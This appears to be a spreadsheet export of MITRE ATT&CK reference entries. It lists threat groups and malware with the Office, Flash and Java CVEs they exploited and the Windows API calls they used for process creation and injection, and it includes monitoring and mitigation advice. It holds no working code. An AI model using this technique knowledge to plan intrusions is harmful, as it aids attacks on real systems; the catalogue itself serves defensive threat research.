[Cobalt Group](https://attack.mitre.org/groups/G0080) had exploited multiple vulnerabilities for execution, including Microsoft’s Equation Editor (CVE-2017-11882), an Internet Explorer vulnerability (CVE-2018-8174), CVE-2017-8570, CVE-2017-0199, and CVE-2017-8759.(Citation: Talos Cobalt Group July 2018)(Citation: PTSecurity Cobalt Group Aug 2017)(Citation: PTSecurity Cobalt Dec 2016)(Citation: Proofpoint Cobalt June 2017)(Citation: RiskIQ Cobalt Nov 2017)(Citation: RiskIQ Cobalt Jan 2018)(Citation: Crowdstrike Global Threat Report Feb 2018)(Citation: TrendMicro Cobalt Group Nov 2017)
Confucius
[Confucius](https://attack.mitre.org/groups/G0142) has exploited Microsoft Office vulnerabilities, including CVE-2015-1641, CVE-2017-11882, and CVE-2018-0802.(Citation: Uptycs Confucius APT Jan 2021)(Citation: TrendMicro Confucius APT Feb 2018)
Darkhotel
[Darkhotel](https://attack.mitre.org/groups/G0012) has exploited Adobe Flash vulnerability CVE-2015-8651 for execution.(Citation: Microsoft DUBNIUM June 2016)
Dragonfly
[Dragonfly](https://attack.mitre.org/groups/G0035) has exploited CVE-2011-0611 in Adobe Flash Player to gain execution on a targeted system.(Citation: Gigamon Berserk Bear October 2021)
EXOTIC LILY
[EXOTIC LILY](https://attack.mitre.org/groups/G1011) has used malicious documents containing exploits for CVE-2021-40444 affecting Microsoft MSHTML.(Citation: Google EXOTIC LILY March 2022)
Elderwood
[Elderwood](https://attack.mitre.org/groups/G0066) has used exploitation of endpoint software, including Microsoft Internet Explorer Adobe Flash vulnerabilities, to gain execution. They have also used zero-day exploits.(Citation: Symantec Elderwood Sept 2012)
Ember Bear
[Ember Bear](https://attack.mitre.org/groups/G1003) has exploited Microsoft Office vulnerability CVE-2017-11882.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )
Higaisa
[Higaisa](https://attack.mitre.org/groups/G0126) has exploited CVE-2018-0798 for execution.(Citation: PTSecurity Higaisa 2020)
Inception
[Inception](https://attack.mitre.org/groups/G0100) has exploited CVE-2012-0158, CVE-2014-1761, CVE-2017-11882 and CVE-2018-0802 for execution.(Citation: Kaspersky Cloud Atlas August 2019)(Citation: Kaspersky Cloud Atlas December 2014)(Citation: Symantec Inception Framework March 2018)(Citation: Unit 42 Inception November 2018)
Lazarus Group
[Lazarus Group](https://attack.mitre.org/groups/G0032) has exploited Adobe Flash vulnerability CVE-2018-4878 for execution.(Citation: McAfee Bankshot)
Leviathan
[Leviathan](https://attack.mitre.org/groups/G0065) has exploited multiple Microsoft Office and .NET vulnerabilities for execution, including CVE-2017-0199, CVE-2017-8759, and CVE-2017-11882.(Citation: Proofpoint Leviathan Oct 2017)(Citation: FireEye Periscope March 2018)(Citation: CISA AA21-200A APT40 July 2021)(Citation: Accenture MUDCARP March 2019)
MuddyWater
[MuddyWater](https://attack.mitre.org/groups/G0069) has exploited the Office vulnerability CVE-2017-0199 for execution.(Citation: ClearSky MuddyWater June 2019)
Mustang Panda
[Mustang Panda](https://attack.mitre.org/groups/G0129) has exploited CVE-2017-0199 in Microsoft Word to execute code.(Citation: Crowdstrike MUSTANG PANDA June 2018)
Patchwork
[Patchwork](https://attack.mitre.org/groups/G0040) uses malicious documents to deliver remote execution exploits as part of. The group has previously exploited CVE-2017-8570, CVE-2012-1856, CVE-2014-4114, CVE-2017-0199, CVE-2017-11882, and CVE-2015-1641.(Citation: Cymmetria Patchwork)(Citation: Securelist Dropping Elephant)(Citation: Symantec Patchwork)(Citation: PaloAlto Patchwork Mar 2018)(Citation: TrendMicro Patchwork Dec 2017)(Citation: Volexity Patchwork June 2018)(Citation: Unit 42 BackConfig May 2020)
Sandworm Team
[Sandworm Team](https://attack.mitre.org/groups/G0034) has exploited vulnerabilities in Microsoft PowerPoint via OLE objects (CVE-2014-4114) and Microsoft Word via crafted TIFF images (CVE-2013-3906).(Citation: iSight Sandworm Oct 2014)(Citation: TrendMicro Sandworm October 2014)(Citation: McAfee Sandworm November 2013)
Sidewinder
[Sidewinder](https://attack.mitre.org/groups/G0121) has exploited vulnerabilities to gain execution including CVE-2017-11882 and CVE-2020-0674.(Citation: ATT Sidewinder January 2021)(Citation: Cyble Sidewinder September 2020)
TA459
[TA459](https://attack.mitre.org/groups/G0062) has exploited Microsoft Word vulnerability CVE-2017-0199 for execution.(Citation: Proofpoint TA459 April 2017)
The White Company
 [The White Company](https://attack.mitre.org/groups/G0089) has taken advantage of a known vulnerability in Microsoft Word (CVE 2012-0158) to execute code.(Citation: Cylance Shaheen Nov 2018)
Threat Group-3390
[Threat Group-3390](https://attack.mitre.org/groups/G0027) has exploited CVE-2018-0798 in Equation Editor.(Citation: Trend Micro Iron Tiger April 2021)
Tonto Team
[Tonto Team](https://attack.mitre.org/groups/G0131) has exploited Microsoft vulnerabilities, including CVE-2018-0798, CVE-2018-8174, CVE-2018-0802, CVE-2017-11882, CVE-2019-9489 CVE-2020-8468, and CVE-2018-0798 to enable execution of their delivered malicious payloads.(Citation: Kaspersky CactusPete Aug 2020)(Citation: TrendMicro Tonto Team October 2020)(Citation: Talos Bisonal Mar 2020)(Citation: Talos Bisonal 10 Years March 2020) 
Transparent Tribe
[Transparent Tribe](https://attack.mitre.org/groups/G0134) has crafted malicious files to exploit CVE-2012-0158 and CVE-2010-3333 for execution.(Citation: Proofpoint Operation Transparent Tribe March 2016)
Tropic Trooper
[Tropic Trooper](https://attack.mitre.org/groups/G0081) has executed commands through Microsoft security vulnerabilities, including CVE-2017-11882, CVE-2018-0802, and CVE-2012-0158.(Citation: TrendMicro Tropic Trooper Mar 2018)(Citation: Unit 42 Tropic Trooper Nov 2016)
admin@338
[admin@338](https://attack.mitre.org/groups/G0018) has exploited client software vulnerabilities for execution, such as Microsoft Word CVE-2012-0158.(Citation: FireEye admin@338)
Agent Tesla
[Agent Tesla](https://attack.mitre.org/software/S0331) has exploited Office vulnerabilities such as CVE-2017-11882 and CVE-2017-8570 for execution during delivery.(Citation: SentinelLabs Agent Tesla Aug 2020) 
Bankshot
[Bankshot](https://attack.mitre.org/software/S0239) leverages a known zero-day vulnerability in Adobe Flash to execute the implant into the victims’ machines.(Citation: McAfee Bankshot)
Cobalt Strike
[Cobalt Strike](https://attack.mitre.org/software/S0154) can exploit Oracle Java vulnerabilities for execution, including CVE-2011-3544, CVE-2013-2465, CVE-2012-4681, and CVE-2013-2460.(Citation: Talos Cobalt Strike September 2020)(Citation: Cobalt Strike Manual 4.3 November 2020)
DealersChoice
[DealersChoice](https://attack.mitre.org/software/S0243) leverages vulnerable versions of Flash to perform execution.(Citation: Sofacy DealersChoice)
EvilBunny
[EvilBunny](https://attack.mitre.org/software/S0396) has exploited CVE-2011-4369, a vulnerability in the PRC component in Adobe Reader.(Citation: Cyphort EvilBunny Dec 2014)
HAWKBALL
[HAWKBALL](https://attack.mitre.org/software/S0391) has exploited Microsoft Office vulnerabilities CVE-2017-11882 and CVE-2018-0802 to deliver the payload.(Citation: FireEye HAWKBALL Jun 2019) 
InvisiMole
[InvisiMole](https://attack.mitre.org/software/S0260) has installed legitimate but vulnerable Total Video Player software and wdigest.dll library drivers on compromised hosts to exploit stack overflow and input validation vulnerabilities for code execution.(Citation: ESET InvisiMole June 2020)
Ramsay
[Ramsay](https://attack.mitre.org/software/S0458) has been embedded in documents exploiting CVE-2017-0199, CVE-2017-11882, and CVE-2017-8570.(Citation: Eset Ramsay May 2020)(Citation: Antiy CERT Ramsay April 2020)
SUPERNOVA
[SUPERNOVA](https://attack.mitre.org/software/S0578) was installed via exploitation of a SolarWinds Orion API authentication bypass vulnerability (CVE-2020-10148).(Citation: Carnegie Mellon University Supernova Dec 2020)(Citation: Splunk Supernova Jan 2021)
SpeakUp
[SpeakUp](https://attack.mitre.org/software/S0374) attempts to exploit the following vulnerabilities in order to execute its malicious script: CVE-2012-0874, CVE-2010-1871, CVE-2017-10271, CVE-2018-2894, CVE-2016-3088, JBoss AS 3/4/5/6, and the Hadoop YARN ResourceManager. (Citation: CheckPoint SpeakUp Feb 2019)
Woody RAT
[Woody RAT](https://attack.mitre.org/software/S1065) has relied on CVE-2022-30190 (Follina) for execution during delivery.(Citation: MalwareBytes WoodyRAT Aug 2022)
Xbash
[Xbash](https://attack.mitre.org/software/S0341) can attempt to exploit known vulnerabilities in Hadoop, Redis, or ActiveMQ when it finds those services running in order to conduct further execution.(Citation: Unit42 Xbash Sept 2018)(Citation: Trend Micro Xbash Sept 2018)
</t>
  </si>
  <si>
    <t>Module Load
Monitor DLL/PE file events, specifically creation of these binary files as well as the loading of DLLs into processes. Utilization of the Windows APIs may involve processes loading/accessing system DLLs associated with providing called functions (ex: ntdll.dll, kernel32.dll, advapi32.dll, user32.dll, and gdi32.dll). Monitoring for DLL loads, especially to abnormal/unusual or potentially malicious processes, may indicate abuse of the Windows API. Though noisy, this data can be combined with other indicators to identify adversary activity.
OS API Execution
Monitoring API calls may generate a significant amount of data and may not be useful for defense unless collected under specific circumstances, since benign use of API functions are common and may be difficult to distinguish from malicious behavior. Correlation of other events with behavior surrounding API function calls using API monitoring will provide additional context to an event that may assist in determining if it is due to malicious behavior. Correlation of activity by process lineage by process ID may be sufficient.
Behavior Prevention on Endpoint
On Windows 10, enable Attack Surface Reduction (ASR) rules to prevent Office VBA macros from calling Win32 APIs. (Citation: win10_asr)
Execution Prevention
Identify and block potentially malicious software executed that may be executed through this technique by using application control (Citation: Beechey 2010) tools, like Windows Defender Application Control(Citation: Microsoft Windows Defender Application Control), AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)
Operation Dream Job
During [Operation Dream Job](https://attack.mitre.org/campaigns/C0022), [Lazarus Group](https://attack.mitre.org/groups/G0032) used Windows API `ObtainUserAgentString` to obtain the victim's User-Agent and used the value to connect to their C2 server.(Citation: McAfee Lazarus Jul 2020)
Operation Honeybee
During [Operation Honeybee](https://attack.mitre.org/campaigns/C0006), the threat actors deployed malware that used API calls, including `CreateProcessAsUser`.(Citation: McAfee Honeybee)
Operation Sharpshooter
During [Operation Sharpshooter](https://attack.mitre.org/campaigns/C0013), the first stage downloader resolved various Windows libraries and APIs, including `LoadLibraryA()`, `GetProcAddress()`, and `CreateProcessA()`.(Citation: McAfee Sharpshooter December 2018)
Operation Wocao
During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors used the `CreateProcessA` and `ShellExecute` API functions to launch commands after being injected into a selected process.(Citation: FoxIT Wocao December 2019)
APT37
[APT37](https://attack.mitre.org/groups/G0067) leverages the Windows API calls: VirtualAlloc(), WriteProcessMemory(), and CreateRemoteThread() for process injection.(Citation: Talos Group123)
APT38
[APT38](https://attack.mitre.org/groups/G0082) has used the Windows API to execute code within a victim's system.(Citation: CISA AA20-239A BeagleBoyz August 2020) 
BlackTech
[BlackTech](https://attack.mitre.org/groups/G0098) has used built-in API functions.(Citation: IronNet BlackTech Oct 2021)
Chimera
[Chimera](https://attack.mitre.org/groups/G0114) has used direct Windows system calls by leveraging Dumpert.(Citation: Cycraft Chimera April 2020)
Gamaredon Group
[Gamaredon Group](https://attack.mitre.org/groups/G0047) malware has used &lt;code&gt;CreateProcess&lt;/code&gt; to launch additional malicious components.(Citation: ESET Gamaredon June 2020)
Gorgon Group
[Gorgon Group](https://attack.mitre.org/groups/G0078) malware can leverage the Windows API call, CreateProcessA(), for execution.(Citation: Unit 42 Gorgon Group Aug 2018)
Higaisa
[Higaisa](https://attack.mitre.org/groups/G0126) has called various native OS APIs.(Citation: Zscaler Higaisa 2020)
Lazarus Group
[Lazarus Group](https://attack.mitre.org/groups/G0032) has used the Windows API &lt;code&gt;ObtainUserAgentString&lt;/code&gt; to obtain the User-Agent from a compromised host to connect to a C2 server.(Citation: McAfee Lazarus Jul 2020) [Lazarus Group](https://attack.mitre.org/groups/G0032) has also used various, often lesser known, functions to perform various types of Discovery and [Process Injection](https://attack.mitre.org/techniques/T1055).(Citation: Lazarus APT January 2022)(Citation: Qualys LolZarus)
SideCopy
 [SideCopy](https://attack.mitre.org/groups/G1008) has executed malware by calling the API function `CreateProcessW`.(Citation: MalwareBytes SideCopy Dec 2021)
Silence
[Silence](https://attack.mitre.org/groups/G0091) has leveraged the Windows API, including using CreateProcess() or ShellExecute(), to perform a variety of tasks.(Citation: SecureList Silence Nov 2017)(Citation: Group IB Silence Sept 2018)
TA505
[TA505](https://attack.mitre.org/groups/G0092) has deployed payloads that use Windows API calls on a compromised host.(Citation: Korean FSI TA505 2020)
Tropic Trooper
[Tropic Trooper](https://attack.mitre.org/groups/G0081) has used multiple Windows APIs including HttpInitialize, HttpCreateHttpHandle, and HttpAddUrl.(Citation: TrendMicro Tropic Trooper May 2020)
Turla
[Turla](https://attack.mitre.org/groups/G0010) and its RPC backdoors have used APIs calls for various tasks related to subverting AMSI and accessing then executing commands through RPC and/or named pipes.(Citation: ESET Turla PowerShell May 2019)
menuPass
[menuPass](https://attack.mitre.org/groups/G0045) has used native APIs including &lt;code&gt;GetModuleFileName&lt;/code&gt;, &lt;code&gt;lstrcat&lt;/code&gt;, &lt;code&gt;CreateFile&lt;/code&gt;, and &lt;code&gt;ReadFile&lt;/code&gt;.(Citation: Symantec Cicada November 2020)
ADVSTORESHELL
[ADVSTORESHELL](https://attack.mitre.org/software/S0045) is capable of starting a process using CreateProcess.(Citation: Bitdefender APT28 Dec 2015)
Amadey
[Amadey](https://attack.mitre.org/software/S1025) has used a variety of Windows API calls, including `GetComputerNameA`, `GetUserNameA`, and `CreateProcessA`.(Citation: BlackBerry Amadey 2020)
AppleSeed
[AppleSeed](https://attack.mitre.org/software/S0622) has the ability to use multiple dynamically resolved API calls.(Citation: Malwarebytes Kimsuky June 2021)
Aria-body
[Aria-body](https://attack.mitre.org/software/S0456) has the ability to launch files using &lt;code&gt;ShellExecute&lt;/code&gt;.(Citation: CheckPoint Naikon May 2020)
AsyncRAT
[AsyncRAT](https://attack.mitre.org/software/S1087) has the ability to use OS APIs including `CheckRemoteDebuggerPresent`.(Citation: Telefonica Snip3 December 2021)
Attor
[Attor](https://attack.mitre.org/software/S0438)'s dispatcher has used CreateProcessW API for execution.(Citation: ESET Attor Oct 2019)
Avaddon
[Avaddon](https://attack.mitre.org/software/S0640) has used the Windows Crypto API to generate an AES key.(Citation: Hornet Security Avaddon June 2020)
AvosLocker
[AvosLocker](https://attack.mitre.org/software/S1053) has used a variety of Windows API calls, including `NtCurrentPeb` and `GetLogicalDrives`.(Citation: Malwarebytes AvosLocker Jul 2021)
BADHATCH
[BADHATCH](https://attack.mitre.org/software/S1081) can utilize Native API functions such as, `ToolHelp32` and `Rt1AdjustPrivilege` to enable `SeDebugPrivilege` on a compromised machine.(Citation: Gigamon BADHATCH Jul 2019)
BADNEWS
[BADNEWS](https://attack.mitre.org/software/S0128) has a command to download an .exe and execute it via CreateProcess API. It can also run with ShellExecute.(Citation: Forcepoint Monsoon)(Citation: TrendMicro Patchwork Dec 2017)
BBK
[BBK](https://attack.mitre.org/software/S0470) has the ability to use the &lt;code&gt;CreatePipe&lt;/code&gt; API to add a sub-process for execution via [cmd](https://attack.mitre.org/software/S0106).(Citation: Trend Micro Tick November 2019)
Babuk
[Babuk](https://attack.mitre.org/software/S0638) can use multiple Windows API calls for actions on compromised hosts including discovery and execution.(Citation: Sogeti CERT ESEC Babuk March 2021)(Citation: McAfee Babuk February 2021)(Citation: Medium Babuk February 2021)
BackConfig
[BackConfig](https://attack.mitre.org/software/S0475) can leverage API functions such as &lt;code&gt;ShellExecuteA&lt;/code&gt; and &lt;code&gt;HttpOpenRequestA&lt;/code&gt; in the process of downloading and executing files.(Citation: Unit 42 BackConfig May 2020)
Bad Rabbit
[Bad Rabbit](https://attack.mitre.org/software/S0606) has used various Windows API calls.(Citation: ESET Bad Rabbit)
Bandook
[Bandook](https://attack.mitre.org/software/S0234) has used the ShellExecuteW() function call.(Citation: CheckPoint Bandook Nov 2020) 
Bankshot
[Bankshot](https://attack.mitre.org/software/S0239) creates processes using the Windows API calls: CreateProcessA() and CreateProcessAsUserA().(Citation: McAfee Bankshot)
Bazar
[Bazar](https://attack.mitre.org/software/S0534) can use various APIs to allocate memory and facilitate code execution/injection.(Citation: Cybereason Bazar July 2020)
BendyBear
[BendyBear](https://attack.mitre.org/software/S0574) can load and execute modules and Windows Application Programming (API) calls using standard shellcode API hashing.(Citation: Unit42 BendyBear Feb 2021)
Bisonal
[Bisonal](https://attack.mitre.org/software/S0268) has used the Windows API to communicate with the Service Control Manager to execute a thread.(Citation: Talos Bisonal Mar 2020)
BitPaymer
[BitPaymer](https://attack.mitre.org/software/S0570) has used dynamic API resolution to avoid identifiable strings within the binary, including &lt;code&gt;RegEnumKeyW&lt;/code&gt;.(Citation: Crowdstrike Indrik November 2018)
Black Basta
[Black Basta](https://attack.mitre.org/software/S1070) has the ability to use native APIs for numerous functions including discovery and defense evasion.(Citation: Minerva Labs Black Basta May 2022)(Citation: Cyble Black Basta May 2022)(Citation: Avertium Black Basta June 2022)(Citation: Check Point Black Basta October 2022)
BloodHound
[BloodHound](https://attack.mitre.org/software/S0521) can use .NET API calls in the SharpHound ingestor component to pull Active Directory data.(Citation: GitHub Bloodhound)
BoxCaon
[BoxCaon](https://attack.mitre.org/software/S0651) has used Windows API calls to obtain information about the compromised host.(Citation: Checkpoint IndigoZebra July 2021)
Brute Ratel C4
[Brute Ratel C4](https://attack.mitre.org/software/S1063) can call multiple Windows APIs for execution, to share memory, and defense evasion.(Citation: Palo Alto Brute Ratel July 2022)(Citation: MDSec Brute Ratel August 2022)
Bumblebee
[Bumblebee](https://attack.mitre.org/software/S1039) can use multiple Native APIs.(Citation: Proofpoint Bumblebee April 2022)(Citation: Medium Ali Salem Bumblebee April 2022)
CaddyWiper
[CaddyWiper](https://attack.mitre.org/software/S0693) has the ability to dynamically resolve and use APIs, including `SeTakeOwnershipPrivilege`.(Citation: Cisco CaddyWiper March 2022)
Carberp
[Carberp](https://attack.mitre.org/software/S0484) has used the NtQueryDirectoryFile and ZwQueryDirectoryFile functions to hide files and directories.(Citation: Trusteer Carberp October 2010)
Chaes
[Chaes](https://attack.mitre.org/software/S0631) used the &lt;code&gt;CreateFileW()&lt;/code&gt; API function with read permissions to access downloaded payloads.(Citation: Cybereason Chaes Nov 2020) 
Chrommme
[Chrommme](https://attack.mitre.org/software/S0667) can use Windows API including `WinExec` for execution.(Citation: ESET Gelsemium June 2021)
Clop
[Clop](https://attack.mitre.org/software/S0611) has used built-in API functions such as WNetOpenEnumW(), WNetEnumResourceW(), WNetCloseEnum(), GetProcAddress(), and VirtualAlloc().(Citation: Mcafee Clop Aug 2019)(Citation: Cybereason Clop Dec 2020)
Cobalt Strike
[Cobalt Strike](https://attack.mitre.org/software/S0154)'s Beacon payload is capable of running shell commands without &lt;code&gt;cmd.exe&lt;/code&gt; and PowerShell commands without &lt;code&gt;powershell.exe&lt;/code&gt;(Citation: cobaltstrike manual)(Citation: Talos Cobalt Strike September 2020)(Citation: Cobalt Strike Manual 4.3 November 2020)
ComRAT
[ComRAT](https://attack.mitre.org/software/S0126) can load a PE file from memory or the file system and execute it with &lt;code&gt;CreateProcessW&lt;/code&gt;.(Citation: ESET ComRAT May 2020)
Conti
[Conti](https://attack.mitre.org/software/S0575) has used API calls during execution.(Citation: Cybereason Conti Jan 2021)(Citation: CarbonBlack Conti July 2020) 
CostaBricks
[CostaBricks](https://attack.mitre.org/software/S0614) has used a number of API calls, including `VirtualAlloc`, `VirtualFree`, `LoadLibraryA`, `GetProcAddress`, and `ExitProcess`.(Citation: BlackBerry CostaRicto November 2020) 
Cuba
[Cuba](https://attack.mitre.org/software/S0625) has used several built-in API functions for discovery like GetIpNetTable and NetShareEnum.(Citation: McAfee Cuba April 2021) 
Cyclops Blink
[Cyclops Blink](https://attack.mitre.org/software/S0687) can use various Linux API functions including those for execution and discovery.(Citation: NCSC Cyclops Blink February 2022)
DCSrv
[DCSrv](https://attack.mitre.org/software/S1033) has used various Windows API functions, including `DeviceIoControl`, as part of its encryption process.(Citation: Checkpoint MosesStaff Nov 2021)
DEADEYE
[DEADEYE](https://attack.mitre.org/software/S1052) can execute the `GetComputerNameA` and `GetComputerNameExA` WinAPI functions.(Citation: Mandiant APT41)
DRATzarus
[DRATzarus](https://attack.mitre.org/software/S0694) can use various API calls to see if it is running in a sandbox.(Citation: ClearSky Lazarus Aug 2020)
DarkTortilla
[DarkTortilla](https://attack.mitre.org/software/S1066) can use a variety of API calls for persistence and defense evasion.(Citation: Secureworks DarkTortilla Aug 2022)
Denis
[Denis](https://attack.mitre.org/software/S0354) used the &lt;code&gt;IsDebuggerPresent&lt;/code&gt;, &lt;code&gt;OutputDebugString&lt;/code&gt;, and &lt;code&gt;SetLastError&lt;/code&gt; APIs to avoid debugging. [Denis](https://attack.mitre.org/software/S0354) used &lt;code&gt;GetProcAddress&lt;/code&gt; and &lt;code&gt;LoadLibrary&lt;/code&gt; to dynamically resolve APIs. [Denis](https://attack.mitre.org/software/S0354) also used the &lt;code&gt;Wow64SetThreadContext&lt;/code&gt; API as part of a process hollowing process.(Citation: Cybereason Cobalt Kitty 2017)	
Diavol
[Diavol](https://attack.mitre.org/software/S0659) has used several API calls like `GetLogicalDriveStrings`, `SleepEx`, `SystemParametersInfoAPI`, `CryptEncrypt`, and others to execute parts of its attack.(Citation: Fortinet Diavol July 2021)
Donut
[Donut](https://attack.mitre.org/software/S0695) code modules use various API functions to load and inject code.(Citation: Donut Github)	
Dridex
[Dridex](https://attack.mitre.org/software/S0384) has used the &lt;code&gt;OutputDebugStringW&lt;/code&gt; function to avoid malware analysis as part of its anti-debugging technique.(Citation: Checkpoint Dridex Jan 2021) 
Egregor
[Egregor](https://attack.mitre.org/software/S0554) has used the Windows API to make detection more difficult.(Citation: Cyble Egregor Oct 2020) 
Emotet
[Emotet](https://attack.mitre.org/software/S0367) has used `CreateProcess` to create a new process to run its executable and `WNetEnumResourceW` to enumerate non-hidden shares.(Citation: Binary Defense Emotes Wi-Fi Spreader)
Empire
[Empire](https://attack.mitre.org/software/S0363) contains a variety of enumeration modules that have an option to use API calls to carry out tasks.(Citation: Github PowerShell Empire)
EvilBunny
[EvilBunny](https://attack.mitre.org/software/S0396) has used various API calls as part of its checks to see if the malware is running in a sandbox.(Citation: Cyphort EvilBunny Dec 2014)	
Explosive
[Explosive](https://attack.mitre.org/software/S0569) has a function to call the OpenClipboard wrapper.(Citation: CheckPoint Volatile Cedar March 2015)  
FatDuke
[FatDuke](https://attack.mitre.org/software/S0512) can call &lt;code&gt;ShellExecuteW&lt;/code&gt; to open the default browser on the URL localhost.(Citation: ESET Dukes October 2019)
Flagpro
[Flagpro](https://attack.mitre.org/software/S0696) can use Native API to enable obfuscation including `GetLastError` and `GetTickCount`.(Citation: NTT Security Flagpro new December 2021)
FoggyWeb
[FoggyWeb](https://attack.mitre.org/software/S0661)'s loader can use API functions to load the [FoggyWeb](https://attack.mitre.org/software/S0661) backdoor into the same Application Domain within which the legitimate AD FS managed code is executed.(Citation: MSTIC FoggyWeb September 2021)
FunnyDream
[FunnyDream](https://attack.mitre.org/software/S1044) can use Native API for defense evasion, discovery, and collection.(Citation: Bitdefender FunnyDream Campaign November 2020)
Gelsemium
[Gelsemium](https://attack.mitre.org/software/S0666) has the ability to use various Windows API functions to perform tasks.(Citation: ESET Gelsemium June 2021)
GoldenSpy
[GoldenSpy](https://attack.mitre.org/software/S0493) can execute remote commands in the Windows command shell using the &lt;code&gt;WinExec()&lt;/code&gt; API.(Citation: Trustwave GoldenSpy June 2020)	
Goopy
[Goopy](https://attack.mitre.org/software/S0477) has the ability to  enumerate the infected system's user name via &lt;code&gt;GetUserNameW&lt;/code&gt;.(Citation: Cybereason Cobalt Kitty 2017)
Grandoreiro
[Grandoreiro](https://attack.mitre.org/software/S0531) can execute through the &lt;code&gt;WinExec&lt;/code&gt; API.(Citation: ESET Grandoreiro April 2020)
GrimAgent
[GrimAgent](https://attack.mitre.org/software/S0632) can use Native API including &lt;code&gt;GetProcAddress&lt;/code&gt; and &lt;code&gt;ShellExecuteW&lt;/code&gt;.(Citation: Group IB GrimAgent July 2021)
GuLoader
[GuLoader](https://attack.mitre.org/software/S0561) can use a number of different APIs for discovery and execution.(Citation: Medium Eli Salem GuLoader April 2021)
HAWKBALL
[HAWKBALL](https://attack.mitre.org/software/S0391) has leveraged several Windows API calls to create processes, gather disk information, and detect debugger activity.(Citation: FireEye HAWKBALL Jun 2019)
Hancitor
[Hancitor](https://attack.mitre.org/software/S0499) has used &lt;code&gt;CallWindowProc&lt;/code&gt; and &lt;code&gt;EnumResourceTypesA&lt;/code&gt; to interpret and execute shellcode.(Citation: FireEye Hancitor)
HermeticWiper
[HermeticWiper](https://attack.mitre.org/software/S0697) can call multiple Windows API functions used for privilege escalation, service execution, and to overwrite random bites of data.(Citation: SentinelOne Hermetic Wiper February 2022)(Citation: Crowdstrike DriveSlayer February 2022)(Citation: ESET Hermetic Wizard March 2022)(Citation: Qualys Hermetic Wiper March 2022)
HermeticWizard
[HermeticWizard](https://attack.mitre.org/software/S0698) can connect to remote shares using `WNetAddConnection2W`.(Citation: ESET Hermetic Wizard March 2022)
HotCroissant
[HotCroissant](https://attack.mitre.org/software/S0431) can perform dynamic DLL importing and API lookups using &lt;code&gt;LoadLibrary&lt;/code&gt; and &lt;code&gt;GetProcAddress&lt;/code&gt; on obfuscated strings.(Citation: US-CERT HOTCROISSANT February 2020)
HyperBro
[HyperBro](https://attack.mitre.org/software/S0398) has the ability to run an application (&lt;code&gt;CreateProcessW&lt;/code&gt;) or script/file (&lt;code&gt;ShellExecuteW&lt;/code&gt;) via API.(Citation: Unit42 Emissary Panda May 2019)
HyperStack
[HyperStack](https://attack.mitre.org/software/S0537) can use Windows API's &lt;code&gt;ConnectNamedPipe&lt;/code&gt; and &lt;code&gt;WNetAddConnection2&lt;/code&gt; to detect incoming connections and connect to remote shares.(Citation: Accenture HyperStack October 2020)
IcedID
[IcedID](https://attack.mitre.org/software/S0483) has called &lt;code&gt;ZwWriteVirtualMemory&lt;/code&gt;, &lt;code&gt;ZwProtectVirtualMemory&lt;/code&gt;, &lt;code&gt;ZwQueueApcThread&lt;/code&gt;, and &lt;code&gt;NtResumeThread&lt;/code&gt; to inject itself into a remote process.(Citation: Juniper IcedID June 2020)
Imminent Monitor
[Imminent Monitor](https://attack.mitre.org/software/S0434) has leveraged CreateProcessW() call to execute the debugger.(Citation: QiAnXin APT-C-36 Feb2019)
InnaputRAT
[InnaputRAT](https://attack.mitre.org/software/S0259) uses the API call ShellExecuteW for execution.(Citation: ASERT InnaputRAT April 2018)
InvisiMole
[InvisiMole](https://attack.mitre.org/software/S0260) can use winapiexec tool for indirect execution of  &lt;code&gt;ShellExecuteW&lt;/code&gt; and &lt;code&gt;CreateProcessA&lt;/code&gt;.(Citation: ESET InvisiMole June 2020)
KOCTOPUS
[KOCTOPUS](https://attack.mitre.org/software/S0669) can use the `LoadResource` and `CreateProcessW` APIs for execution.(Citation: MalwareBytes LazyScripter Feb 2021)
KONNI
[KONNI](https://attack.mitre.org/software/S0356) has hardcoded API calls within its functions to use on the victim's machine.(Citation: Malwarebytes Konni Aug 2021) 
Kevin
[Kevin](https://attack.mitre.org/software/S1020) can use the `ShowWindow` API to avoid detection.(Citation: Kaspersky Lyceum October 2021)
KillDisk
[KillDisk](https://attack.mitre.org/software/S0607) has called the Windows API to retrieve the hard disk handle and shut down the machine.(Citation: Trend Micro KillDisk 1)
LightNeuron
[LightNeuron](https://attack.mitre.org/software/S0395) is capable of starting a process using CreateProcess.(Citation: ESET LightNeuron May 2019)
LitePower
[LitePower](https://attack.mitre.org/software/S0680) can use various API calls.(Citation: Kaspersky WIRTE November 2021)
Lizar
[Lizar](https://attack.mitre.org/software/S0681) has used various Windows API functions on a victim's machine.(Citation: BiZone Lizar May 2021) 
Lokibot
[Lokibot](https://attack.mitre.org/software/S0447) has used LoadLibrary(), GetProcAddress() and CreateRemoteThread() API functions to execute its shellcode.(Citation: Talos Lokibot Jan 2021)
MacMa
[MacMa](https://attack.mitre.org/software/S1016) has used macOS API functions to perform tasks.(Citation: ESET DazzleSpy Jan 2022)(Citation: Objective-See MacMa Nov 2021)
Mafalda
[Mafalda](https://attack.mitre.org/software/S1060) can use a variety of API calls.(Citation: SentinelLabs Metador Sept 2022)
MarkiRAT
[MarkiRAT](https://attack.mitre.org/software/S0652) can run the ShellExecuteW API via the Windows Command Shell.(Citation: Kaspersky Ferocious Kitten Jun 2021)
Maze
[Maze](https://attack.mitre.org/software/S0449) has used several Windows API functions throughout the encryption process including IsDebuggerPresent, TerminateProcess, Process32FirstW, among others.(Citation: McAfee Maze March 2020)	
MegaCortex
After escalating privileges, [MegaCortex](https://attack.mitre.org/software/S0576) calls &lt;code&gt;TerminateProcess()&lt;/code&gt;, &lt;code&gt;CreateRemoteThread&lt;/code&gt;, and other Win32 APIs.(Citation: IBM MegaCortex)
Metamorfo
[Metamorfo](https://attack.mitre.org/software/S0455) has used native WINAPI calls.(Citation: Medium Metamorfo Apr 2020)(Citation: Fortinet Metamorfo Feb 2020)
Meteor
[Meteor](https://attack.mitre.org/software/S0688) can use `WinAPI` to remove a victim machine from an Active Directory domain.(Citation: Check Point Meteor Aug 2021)
Milan
[Milan](https://attack.mitre.org/software/S1015) can use the API `DnsQuery_A` for DNS resolution.(Citation: Kaspersky Lyceum October 2021)
Mis-Type
[Mis-Type](https://attack.mitre.org/software/S0084) has used Windows API calls, including `NetUserAdd` and `NetUserDel`.(Citation: Cylance Dust Storm)
Misdat
